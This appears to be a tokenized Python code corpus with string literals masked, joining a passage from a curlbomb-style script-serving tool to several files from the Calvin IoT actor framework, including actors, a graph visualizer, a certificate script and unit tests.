'<STR_LIT>' . format ( k ) <EOL> else : <EOL> knock = '<STR_LIT>' . format ( k ) <EOL> hostname_header = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> if settings [ '<STR_LIT>' ] . startswith ( "<STR_LIT>" ) : <EOL> hostname_header = '<STR_LIT>' <EOL> else : <EOL> hostname_header = '<STR_LIT>' <EOL> url = "<STR_LIT>" . format ( <EOL> ssl = "<STR_LIT:s>" if settings [ '<STR_LIT>' ] is not False else "<STR_LIT>" , <EOL> host = settings [ '<STR_LIT>' ] , <EOL> port = settings [ '<STR_LIT>' ] , <EOL> knock = knock , <EOL> hostname_header = hostname_header <EOL> ) <EOL> stream_url = "<STR_LIT>" . 
format ( <EOL> ssl = "<STR_LIT:s>" if settings [ '<STR_LIT>' ] is not False else "<STR_LIT>" , <EOL> host = settings [ '<STR_LIT>' ] , <EOL> port = settings [ '<STR_LIT>' ] , <EOL> knock = knock , <EOL> hostname_header = hostname_header <EOL> ) <EOL> logger = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> logger = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> callback_cmd = "<STR_LIT>" <EOL> if settings [ '<STR_LIT>' ] : <EOL> callback_cmd = "<STR_LIT>" + callback_cmd <EOL> else : <EOL> callback_cmd = "<STR_LIT>" . format ( cmd = callback_cmd ) <EOL> if settings [ '<STR_LIT>' ] : <EOL> callback_cmd = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> logger += callback_cmd . format ( <EOL> stream_url = stream_url , <EOL> pin_settings = pin_settings <EOL> ) <EOL> if settings [ '<STR_LIT>' ] is None or settings [ '<STR_LIT>' ] : <EOL> cmd = "<STR_LIT>" . format ( <EOL> http_fetcher = settings [ '<STR_LIT>' ] , <EOL> url = url , <EOL> pin_settings = pin_settings , <EOL> logger = logger ) <EOL> else : <EOL> cmd = "<STR_LIT>" <EOL> if not settings [ '<STR_LIT>' ] : <EOL> cmd = "<STR_LIT>" <EOL> cmd = cmd . format ( <EOL> shell_command = settings [ '<STR_LIT>' ] , <EOL> http_fetcher = settings [ '<STR_LIT>' ] , <EOL> pin_settings = pin_settings , <EOL> url = url , <EOL> logger = logger ) <EOL> return cmd <EOL> else : <EOL> if settings [ '<STR_LIT>' ] : <EOL> if settings [ '<STR_LIT>' ] : <EOL> if settings [ '<STR_LIT>' ] . startswith ( "<STR_LIT>" ) : <EOL> knock_header = '<STR_LIT>' . format ( settings [ '<STR_LIT>' ] ) <EOL> else : <EOL> knock_header = '<STR_LIT>' . format ( settings [ '<STR_LIT>' ] ) <EOL> else : <EOL> knock_header = '<STR_LIT>' <EOL> cmd = "<STR_LIT>" + knock_header <EOL> else : <EOL> cmd = "<STR_LIT>" <EOL> return cmd . 
format ( <EOL> http_fetcher = settings [ '<STR_LIT>' ] , <EOL> ssl = "<STR_LIT:s>" if settings [ '<STR_LIT>' ] is not False else "<STR_LIT>" , <EOL> host = settings [ '<STR_LIT>' ] , <EOL> port = settings [ '<STR_LIT>' ] , <EOL> pin_settings = pin_settings , <EOL> knock = "<STR_LIT>" . format ( <EOL> shlex . quote ( settings [ '<STR_LIT>' ] ) ) if settings [ '<STR_LIT>' ] else '<STR_LIT>' <EOL> ) <EOL> def get_settings ( args = None , override_defaults = { } ) : <EOL> """<STR_LIT>""" <EOL> parser = argparser ( ) <EOL> args = parser . parse_args ( args ) <EOL> settings = { <EOL> '<STR_LIT:args>' : args , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : args . mime_type , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : args . log_post_backs , <EOL> '<STR_LIT>' : args . ssl , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : args . pin or args . ssl is None , <EOL> '<STR_LIT>' : args . num_gets , <EOL> '<STR_LIT>' : not args . disable_knock , <EOL> '<STR_LIT>' : args . knock , <EOL> '<STR_LIT>' : args . verbose , <EOL> '<STR_LIT>' : args . survey , <EOL> '<STR_LIT>' : args . ssh , <EOL> '<STR_LIT>' : args . quiet and not args . verbose , <EOL> '<STR_LIT>' : args . client_logging , <EOL> '<STR_LIT>' : args . client_quiet , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : args . wget , <EOL> '<STR_LIT>' : args . unwrapped , <EOL> '<STR_LIT>' : sys . stdin , <EOL> '<STR_LIT>' : sys . stdout , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : get_curlbomb_command <EOL> } <EOL> settings . update ( override_defaults ) <EOL> if args . verbose : <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . INFO ) <EOL> settings [ '<STR_LIT>' ] = True <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . INFO ) <EOL> if args . debug : <EOL> settings [ '<STR_LIT>' ] = True <EOL> logging . getLogger ( '<STR_LIT>' ) . 
setLevel ( level = logging . DEBUG ) <EOL> settings [ '<STR_LIT>' ] = True <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . DEBUG ) <EOL> if settings [ '<STR_LIT>' ] and not settings [ '<STR_LIT>' ] : <EOL> settings [ '<STR_LIT>' ] = base64 . b64encode ( bytes ( random . sample ( range ( <NUM_LIT> ) , <NUM_LIT:12> ) ) , <EOL> altchars = b'<STR_LIT>' ) . decode ( "<STR_LIT:utf-8>" ) <EOL> if settings [ '<STR_LIT>' ] : <EOL> settings [ '<STR_LIT>' ] = False <EOL> settings [ '<STR_LIT>' ] = False <EOL> if args . disable_postback : <EOL> settings [ '<STR_LIT>' ] = False <EOL> if settings [ '<STR_LIT>' ] : <EOL> settings [ '<STR_LIT>' ] = False <EOL> if args . pin and args . ssl is False : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . wget : <EOL> settings [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if args . log_post_backs : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . pin : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . port == "<STR_LIT>" : <EOL> s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> s . bind ( ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> settings [ '<STR_LIT:port>' ] = s . getsockname ( ) [ <NUM_LIT:1> ] <EOL> s . close ( ) <EOL> else : <EOL> settings [ '<STR_LIT:port>' ] = int ( args . port ) <EOL> settings [ '<STR_LIT>' ] = socket . gethostbyname ( socket . gethostname ( ) ) <EOL> settings [ '<STR_LIT>' ] = settings [ '<STR_LIT:port>' ] <EOL> if settings [ '<STR_LIT>' ] : <EOL> ssh_parts = settings [ '<STR_LIT>' ] . 
split ( "<STR_LIT::>" ) <EOL> ssh_host = ssh_parts [ <NUM_LIT:0> ] <EOL> ssh_port = <NUM_LIT> <EOL> http_port = settings [ '<STR_LIT:port>' ] <EOL> if len ( ssh_parts ) == <NUM_LIT:3> : <EOL> ssh_port = ssh_parts [ <NUM_LIT:1> ] <EOL> http_port = ssh_parts [ <NUM_LIT:2> ] <EOL> elif len ( ssh_parts ) == <NUM_LIT:2> : <EOL> http_port = ssh_parts [ <NUM_LIT:1> ] <EOL> settings [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> port = settings [ '<STR_LIT:port>' ] , http_port = http_port ) <EOL> settings [ '<STR_LIT>' ] = ssh_host <EOL> settings [ '<STR_LIT>' ] = ssh_port <EOL> settings [ '<STR_LIT>' ] = http_port <EOL> if '<STR_LIT:@>' in ssh_host : <EOL> settings [ '<STR_LIT>' ] , settings [ '<STR_LIT>' ] = ssh_host . split ( '<STR_LIT:@>' ) <EOL> else : <EOL> settings [ '<STR_LIT>' ] = ssh_host <EOL> if args . domain : <EOL> parts = args . domain . split ( "<STR_LIT::>" ) <EOL> settings [ '<STR_LIT>' ] = parts [ <NUM_LIT:0> ] <EOL> if len ( parts ) > <NUM_LIT:1> : <EOL> settings [ '<STR_LIT>' ] = parts [ <NUM_LIT:1> ] <EOL> if settings [ '<STR_LIT>' ] is not False : <EOL> settings [ '<STR_LIT>' ] = tls . get_ssl_context_from_settings ( settings ) <EOL> if not settings [ '<STR_LIT>' ] . isatty ( ) and not settings [ '<STR_LIT>' ] : <EOL> settings [ '<STR_LIT>' ] = True <EOL> try : <EOL> prepare_cmd = args . prepare_command <EOL> except AttributeError : <EOL> args . command = None <EOL> args . script_hash = None <EOL> args . signature = None <EOL> args . resource = settings [ '<STR_LIT>' ] <EOL> prepare_cmd = run . prepare <EOL> prepare_cmd ( args , settings , parser ) <EOL> return settings </s>
<s> import sys <EOL> import textwrap <EOL> import argparse <EOL> from calvin . actorstore . store import DocumentationStore <EOL> from calvin . Tools import cscompiler <EOL> from calvin . csparser . parser import calvin_parser <EOL> def _refname ( name ) : <EOL> return "<STR_LIT>" if name == '<STR_LIT:.>' else name . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) <EOL> class Viz ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( Viz , self ) . __init__ ( ) <EOL> def __str__ ( self ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def render ( self ) : <EOL> return str ( self ) <EOL> class LinkViz ( Viz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , link ) : <EOL> super ( LinkViz , self ) . __init__ ( ) <EOL> link [ '<STR_LIT:src>' ] = _refname ( link [ '<STR_LIT:src>' ] ) <EOL> link [ '<STR_LIT>' ] = _refname ( link [ '<STR_LIT>' ] ) <EOL> self . link = link <EOL> def __str__ ( self ) : <EOL> if not self . link [ '<STR_LIT:src>' ] : <EOL> return '<STR_LIT>' . format ( ** self . link ) <EOL> elif not self . link [ '<STR_LIT>' ] : <EOL> return '<STR_LIT>' . format ( ** self . link ) <EOL> else : <EOL> return '<STR_LIT>' . format ( ** self . link ) <EOL> class ActorViz ( Viz ) : <EOL> """<STR_LIT>""" <EOL> docstore = DocumentationStore ( ) <EOL> def __init__ ( self , name , actor_type , args , ** dummy ) : <EOL> super ( ActorViz , self ) . __init__ ( ) <EOL> self . type_color = '<STR_LIT>' <EOL> self . name = name <EOL> self . args = args <EOL> self . actor_type = actor_type <EOL> doc = self . docstore . help_raw ( actor_type ) <EOL> self . set_ports ( doc ) <EOL> def set_ports ( self , doc ) : <EOL> inports = [ p for p , _ in doc [ '<STR_LIT>' ] ] <EOL> outports = [ p for p , _ in doc [ '<STR_LIT>' ] ] <EOL> inlen = len ( inports ) <EOL> outlen = len ( outports ) <EOL> self . portrows = max ( inlen , outlen ) <EOL> self . inports = inports + [ '<STR_LIT>' ] * ( self . portrows - inlen ) <EOL> self . 
outports = outports + [ '<STR_LIT>' ] * ( self . portrows - outlen ) <EOL> def __str__ ( self ) : <EOL> lines = [ ] <EOL> lines . append ( '<STR_LIT>' . format ( _refname ( self . name ) ) ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> lines . append ( '<STR_LIT>' . format ( self . name , self . type_color ) ) <EOL> lines . append ( '<STR_LIT>' . format ( self . actor_type ) ) <EOL> is_first = True <EOL> for inport , outport in zip ( self . inports , self . outports ) : <EOL> inref = '<STR_LIT>' . format ( inport ) if inport else '<STR_LIT>' <EOL> outref = '<STR_LIT>' . format ( outport ) if outport else '<STR_LIT>' <EOL> if is_first : <EOL> is_first = False <EOL> middle = '<STR_LIT>' . format ( self . portrows ) <EOL> else : <EOL> middle = '<STR_LIT>' <EOL> lines . append ( '<STR_LIT>' . format ( inref , inport , outref , outport , middle ) ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT:\n>' . join ( lines ) <EOL> class PadViz ( Viz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , padname , direction ) : <EOL> super ( PadViz , self ) . __init__ ( ) <EOL> self . padname = padname <EOL> self . direction = direction <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . padname , self . direction ) <EOL> class CompViz ( ActorViz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , comp_type , comp_def ) : <EOL> self . type_color = '<STR_LIT>' <EOL> self . name = name <EOL> self . args = comp_def [ '<STR_LIT>' ] <EOL> self . actor_type = comp_type <EOL> doc = self . docstore . component_docs ( '<STR_LIT:.>' + comp_type , comp_def ) <EOL> self . set_ports ( doc ) <EOL> class AppViz ( Viz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , deployable ) : <EOL> super ( AppViz , self ) . __init__ ( ) <EOL> self . actors = [ ActorViz ( name , ** args ) for name , args in deployable [ '<STR_LIT>' ] . iteritems ( ) ] <EOL> self . links = [ ] <EOL> for src , dstlist in deployable [ '<STR_LIT>' ] . 
iteritems ( ) : <EOL> _src , _src_port = src . split ( '<STR_LIT:.>' ) <EOL> for dst in dstlist : <EOL> _dst , _dst_port = dst . split ( '<STR_LIT:.>' ) <EOL> link = { '<STR_LIT:src>' : _src , '<STR_LIT>' : _src_port , '<STR_LIT>' : _dst , '<STR_LIT>' : _dst_port } <EOL> self . links . append ( LinkViz ( link ) ) <EOL> self . components = [ ] <EOL> def __str__ ( self ) : <EOL> viz = [ str ( v ) for v in self . actors + self . links + self . components ] <EOL> return '<STR_LIT:\n>' . join ( viz ) <EOL> def render ( self ) : <EOL> return '<STR_LIT>' . format ( str ( self ) ) <EOL> class ScriptViz ( AppViz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ir ) : <EOL> comp_defs = ir [ '<STR_LIT>' ] if '<STR_LIT>' in ir else { } <EOL> self . actors = [ ActorViz ( name , ** args ) for name , args in ir [ '<STR_LIT>' ] [ '<STR_LIT>' ] . iteritems ( ) if '<STR_LIT:.>' in args [ '<STR_LIT>' ] ] <EOL> self . links = [ LinkViz ( link ) for link in ir [ '<STR_LIT>' ] [ '<STR_LIT>' ] if link [ '<STR_LIT:src>' ] and link [ '<STR_LIT>' ] ] <EOL> self . components = [ CompViz ( name , args [ '<STR_LIT>' ] , comp_defs [ args [ '<STR_LIT>' ] ] ) for name , args in ir [ '<STR_LIT>' ] [ '<STR_LIT>' ] . iteritems ( ) if args [ '<STR_LIT>' ] in comp_defs ] <EOL> class CompInternalsViz ( ScriptViz ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , comp_def ) : <EOL> super ( CompInternalsViz , self ) . __init__ ( comp_def ) <EOL> self . name = comp_def [ '<STR_LIT:name>' ] <EOL> self . inpads = [ PadViz ( p , '<STR_LIT>' ) for p in comp_def [ '<STR_LIT>' ] ] <EOL> self . outpads = [ PadViz ( p , '<STR_LIT>' ) for p in comp_def [ '<STR_LIT>' ] ] <EOL> self . padlinks = [ LinkViz ( link ) for link in comp_def [ '<STR_LIT>' ] [ '<STR_LIT>' ] if link [ '<STR_LIT:src>' ] == '<STR_LIT:.>' or link [ '<STR_LIT>' ] == '<STR_LIT:.>' ] <EOL> def render ( self ) : <EOL> viz = [ '<STR_LIT>' ] <EOL> viz += [ '<STR_LIT>' ] <EOL> viz += [ str ( v ) for v in self . inpads ] <EOL> viz . 
append ( '<STR_LIT:}>' ) <EOL> viz += [ '<STR_LIT>' ] <EOL> viz += [ str ( v ) for v in self . outpads ] <EOL> viz . append ( '<STR_LIT:}>' ) <EOL> viz += [ '<STR_LIT>' . format ( self . name ) ] <EOL> viz . append ( str ( self ) ) <EOL> viz . append ( '<STR_LIT:}>' ) <EOL> viz += [ str ( v ) for v in self . padlinks ] <EOL> viz . append ( '<STR_LIT:}>' ) <EOL> return '<STR_LIT:\n>' . join ( viz ) <EOL> def visualize_deployment ( filename ) : <EOL> deployable , errors , warnings = cscompiler . compile_file ( filename ) <EOL> return AppViz ( deployable ) . render ( ) <EOL> def visualize_script ( filename ) : <EOL> with open ( filename , '<STR_LIT:r>' ) as f : <EOL> source_text = f . read ( ) <EOL> ir , errors , warnings = calvin_parser ( source_text , '<STR_LIT:filename>' ) <EOL> return ScriptViz ( ir ) . render ( ) <EOL> def visualize_component_internals ( filename , component ) : <EOL> with open ( filename , '<STR_LIT:r>' ) as f : <EOL> source_text = f . read ( ) <EOL> ir , errors , warnings = calvin_parser ( source_text , '<STR_LIT:filename>' ) <EOL> if component in ir [ '<STR_LIT>' ] : <EOL> comp_def = ir [ '<STR_LIT>' ] [ component ] <EOL> return CompInternalsViz ( comp_def ) . render ( ) <EOL> def main ( ) : <EOL> long_description = """<STR_LIT>""" <EOL> argparser = argparse . ArgumentParser ( <EOL> formatter_class = argparse . RawDescriptionHelpFormatter , <EOL> description = textwrap . dedent ( long_description ) <EOL> ) <EOL> argparser . add_argument ( '<STR_LIT>' , type = str , required = True , <EOL> help = '<STR_LIT>' ) <EOL> group = argparser . add_mutually_exclusive_group ( ) <EOL> group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , type = str , <EOL> help = '<STR_LIT>' ) <EOL> args = argparser . parse_args ( ) <EOL> exit_val = <NUM_LIT:0> <EOL> try : <EOL> if args . deployment : <EOL> res = visualize_deployment ( args . script ) <EOL> elif args . 
component : <EOL> res = visualize_component_internals ( args . script , args . component ) <EOL> else : <EOL> res = visualize_script ( args . script ) <EOL> print ( res ) <EOL> except Exception as e : <EOL> print e <EOL> exit_val = <NUM_LIT:1> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( ) ) </s>
<s> from calvin . actor . actor import Actor , ActionResult , manage , condition , guard <EOL> from calvin . runtime . north . calvin_token import EOSToken , ExceptionToken <EOL> from copy import deepcopy <EOL> class SetValue ( Actor ) : <EOL> """<STR_LIT>""" <EOL> def exception_handler ( self , action , args , context ) : <EOL> return ActionResult ( production = ( ExceptionToken ( ) , ) ) <EOL> @ manage ( ) <EOL> def init ( self ) : <EOL> pass <EOL> def _type_mismatch ( self , container , key ) : <EOL> t_cont = type ( container ) <EOL> t_key = type ( key ) <EOL> return ( t_cont is list and t_key is not int ) or ( t_cont is dict and not isinstance ( key , basestring ) ) <EOL> @ condition ( [ '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:value>' ] , [ '<STR_LIT>' ] ) <EOL> def set_value ( self , data , key , value ) : <EOL> keylist = key if type ( key ) is list else [ key ] <EOL> container = deepcopy ( data ) <EOL> try : <EOL> res = container <EOL> for key in keylist [ : - <NUM_LIT:1> ] : <EOL> if self . _type_mismatch ( res , key ) : <EOL> raise Exception ( ) <EOL> res = res [ key ] <EOL> if self . 
_type_mismatch ( res , keylist [ - <NUM_LIT:1> ] ) : <EOL> raise Exception ( ) <EOL> res [ keylist [ - <NUM_LIT:1> ] ] = value <EOL> except : <EOL> container = ExceptionToken ( ) <EOL> return ActionResult ( production = ( container , ) ) <EOL> action_priority = ( set_value , ) <EOL> test_args = [ ] <EOL> test_kwargs = { } <EOL> test_set = [ <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : <NUM_LIT:1> } ] , '<STR_LIT:key>' : [ '<STR_LIT:a>' ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : <NUM_LIT> } ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] , '<STR_LIT:key>' : [ <NUM_LIT:1> ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:3> ] ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , { '<STR_LIT:a>' : <NUM_LIT:2> } , <NUM_LIT:3> ] ] , '<STR_LIT:key>' : [ [ <NUM_LIT:1> , '<STR_LIT:a>' ] ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , { '<STR_LIT:a>' : <NUM_LIT> } , <NUM_LIT:3> ] ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] } ] , '<STR_LIT:key>' : [ [ '<STR_LIT:a>' , <NUM_LIT:1> ] ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:3> ] } ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] , '<STR_LIT:key>' : [ '<STR_LIT:a>' ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ { '<STR_LIT:a>' : <NUM_LIT:1> } ] , '<STR_LIT:key>' : [ <NUM_LIT:1> ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : 
[ [ <NUM_LIT:1> , { '<STR_LIT:a>' : <NUM_LIT:2> } , <NUM_LIT:3> ] ] , '<STR_LIT:key>' : [ [ <NUM_LIT:1> , <NUM_LIT:2> ] ] , '<STR_LIT:value>' : [ <NUM_LIT> ] } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> } , <EOL> ] </s>
<s> from calvin . actor . actor import Actor , ActionResult , manage , condition <EOL> class Counter ( Actor ) : <EOL> """<STR_LIT>""" <EOL> @ manage ( [ '<STR_LIT:count>' ] ) <EOL> def init ( self ) : <EOL> self . count = <NUM_LIT:0> <EOL> @ condition ( action_output = [ '<STR_LIT>' ] ) <EOL> def cnt ( self ) : <EOL> self . count += <NUM_LIT:1> <EOL> return ActionResult ( production = ( self . count , ) ) <EOL> action_priority = ( cnt , ) <EOL> def report ( self ) : <EOL> return self . count <EOL> test_args = [ ] <EOL> test_set = [ <EOL> { '<STR_LIT>' : { } , '<STR_LIT>' : { '<STR_LIT>' : [ n ] } } for n in range ( <NUM_LIT:1> , <NUM_LIT:10> ) <EOL> ] </s>
<s> from calvin . utilities . calvinlogger import get_logger <EOL> _log = get_logger ( __name__ ) <EOL> class PublicAttribute ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , node , actor ) : <EOL> self . _node = node <EOL> self . _actor = actor <EOL> def exists ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return self . _node . attributes . has_public_attribute ( index ) <EOL> def get ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return self . _node . attributes . get_public ( index ) <EOL> def register ( node , actor ) : <EOL> return PublicAttribute ( node , actor ) </s>
<s> from calvin . actor . actor import Actor , ActionResult , condition <EOL> class Environmental ( Actor ) : <EOL> """<STR_LIT>""" <EOL> def init ( self ) : <EOL> self . setup ( ) <EOL> def setup ( self ) : <EOL> self . use ( "<STR_LIT>" , shorthand = "<STR_LIT>" ) <EOL> self . sensor = self [ "<STR_LIT>" ] <EOL> def did_migrate ( self ) : <EOL> self . setup ( ) <EOL> @ condition ( action_input = [ "<STR_LIT>" ] , action_output = [ "<STR_LIT:data>" ] ) <EOL> def get_data ( self , input ) : <EOL> data = "<STR_LIT>" % ( int ( self . sensor . get_temperature ( ) ) , <EOL> int ( self . sensor . get_humidity ( ) ) , <EOL> int ( self . sensor . get_pressure ( ) ) ) <EOL> return ActionResult ( production = ( data , ) ) <EOL> action_priority = ( get_data , ) <EOL> requires = [ "<STR_LIT>" ] </s>
<s> from calvin . utilities import dynops <EOL> def req_op ( node , actor_id = None , component = None ) : <EOL> """<STR_LIT>""" <EOL> it = dynops . List ( [ node . id ] ) <EOL> it . final ( ) <EOL> return it </s>
<s> from calvin . runtime . south . plugins . io . display import base_display <EOL> class Display ( base_display . DisplayBase ) : <EOL> """<STR_LIT>""" <EOL> def show_text ( self , text ) : <EOL> print text </s>
<s> from calvin . utilities import certificate <EOL> import os <EOL> print "<STR_LIT>" <EOL> testconfig = certificate . Config ( domain = "<STR_LIT:test>" ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> certificate . new_domain ( testconfig ) <EOL> print "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> for j in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> name = "<STR_LIT>" . format ( i , j ) <EOL> certreq = certificate . new_runtime ( testconfig , name ) <EOL> certificate . sign_req ( testconfig , os . path . basename ( certreq ) , name ) <EOL> certreq = certificate . new_runtime ( testconfig , "<STR_LIT>" ) <EOL> certificate . sign_req ( testconfig , os . path . basename ( certreq ) , "<STR_LIT>" ) </s>
<s> import pytest <EOL> from mock import Mock <EOL> from calvin . tests import DummyNode <EOL> from calvin . runtime . north . actormanager import ActorManager <EOL> from calvin . runtime . south . endpoint import LocalOutEndpoint , LocalInEndpoint <EOL> from calvin . actor . actor import Actor <EOL> pytestmark = pytest . mark . unittest <EOL> def create_actor ( node ) : <EOL> actor_manager = ActorManager ( node ) <EOL> actor_id = actor_manager . new ( '<STR_LIT>' , { } ) <EOL> actor = actor_manager . actors [ actor_id ] <EOL> actor . _calvinsys = Mock ( ) <EOL> return actor <EOL> @ pytest . fixture <EOL> def actor ( ) : <EOL> return create_actor ( DummyNode ( ) ) <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" , True ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" , True ) , <EOL> ] ) <EOL> def test_set_port_property ( port_type , port_name , port_property , value , expected ) : <EOL> assert actor ( ) . set_port_property ( port_type , port_name , port_property , value ) is expected <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( False , False , False ) , <EOL> ( False , True , False ) , <EOL> ( True , False , False ) , <EOL> ( True , True , True ) , <EOL> ] ) <EOL> def test_did_connect ( actor , inport_ret_val , outport_ret_val , expected ) : <EOL> for port in actor . inports . values ( ) : <EOL> port . is_connected = Mock ( return_value = inport_ret_val ) <EOL> for port in actor . outports . values ( ) : <EOL> port . is_connected = Mock ( return_value = outport_ret_val ) <EOL> actor . 
fsm = Mock ( ) <EOL> actor . did_connect ( None ) <EOL> if expected : <EOL> actor . fsm . transition_to . assert_called_with ( Actor . STATUS . ENABLED ) <EOL> assert actor . _calvinsys . scheduler_wakeup . called <EOL> else : <EOL> assert not actor . fsm . transition_to . called <EOL> assert not actor . _calvinsys . scheduler_wakeup . called <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ <EOL> ( True , True , False ) , <EOL> ( True , False , False ) , <EOL> ( False , True , False ) , <EOL> ( False , False , True ) , <EOL> ] ) <EOL> def test_did_disconnect ( actor , inport_ret_val , outport_ret_val , expected ) : <EOL> for port in actor . inports . values ( ) : <EOL> port . is_connected = Mock ( return_value = inport_ret_val ) <EOL> for port in actor . outports . values ( ) : <EOL> port . is_connected = Mock ( return_value = outport_ret_val ) <EOL> actor . fsm = Mock ( ) <EOL> actor . did_disconnect ( None ) <EOL> if expected : <EOL> actor . fsm . transition_to . assert_called_with ( Actor . STATUS . READY ) <EOL> else : <EOL> assert not actor . fsm . transition_to . called <EOL> def test_enabled ( actor ) : <EOL> actor . enable ( ) <EOL> assert actor . enabled ( ) <EOL> actor . disable ( ) <EOL> assert not actor . enabled ( ) <EOL> def test_connections ( ) : <EOL> node = DummyNode ( ) <EOL> node . id = "<STR_LIT>" <EOL> actor = create_actor ( node ) <EOL> inport = actor . inports [ '<STR_LIT>' ] <EOL> outport = actor . outports [ '<STR_LIT>' ] <EOL> port = Mock ( ) <EOL> port . id = "<STR_LIT:x>" <EOL> peer_port = Mock ( ) <EOL> peer_port . id = "<STR_LIT:y>" <EOL> inport . attach_endpoint ( LocalInEndpoint ( port , peer_port ) ) <EOL> outport . attach_endpoint ( LocalOutEndpoint ( port , peer_port ) ) <EOL> assert actor . connections ( node ) == { <EOL> '<STR_LIT>' : actor . id , <EOL> '<STR_LIT>' : actor . name , <EOL> '<STR_LIT>' : { inport . id : ( node , "<STR_LIT:y>" ) } , <EOL> '<STR_LIT>' : { outport . 
